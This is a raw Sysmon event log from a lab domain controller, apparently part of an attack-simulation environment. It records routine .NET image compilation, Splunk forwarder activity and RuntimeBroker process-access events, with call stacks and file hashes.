21:06:58.533{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3405-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-A272-60D3-3305-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R3KAU2QB1L\ipamapi.ni.dll.auxMD5=39CC25500D78930082A6A370B38337C4,SHA256=E8BF4575E516C330F2BB6ADF06DFE29D1653F19125D24F1265921679DB280881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.533{4DB9351A-A272-60D3-3305-00000000CF01}5516NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\R3KAU2QB1L\ipamapi.ni.dllMD5=7511815FCDE639D51F253CEE16E64B16,SHA256=FFDB8F0FC789C7E0167F5E262688ECC5A884400E6881FDF1EB22CA7E16D49811,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.314{4DB9351A-A271-60D3-3005-00000000CF01}71244716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.116{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.087{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.080{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A272-60D3-3305-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.072{4DB9351A-A271-60D3-3205-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VSEHCNEROT\EventViewer.ni.dll.auxMD5=1A32F72493212F677415ED59CF716D2D,SHA256=3D3E276DA67057875F2F219BFB36D44431F2E549FB5004FDBABBECE3F1904633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-A271-60D3-3205-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VSEHCNEROT\EventViewer.ni.dllMD5=296A3FAB077099E2147D6795C54648FD,SHA256=1E2E55F9F6E82DFC37EE072932320896C3A03218E21026C654FCCFC8FB39BA93,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C9A5DE1CA67202ADF3A52ECD105CA81,SHA256=DCBBDB339850E33C6D3CE385E35C369F23997ACD583C8B1ADED74B8B145883A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.060{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE9E40589907E17C66F6068E118D6C1F,SHA256=3D89C6CDD9E59A193E6077058AF43B482B5E3FE01DF853F168415ACF1B58DC3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.044{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.044{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.873{4DB9351A-A271-60D3-3005-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 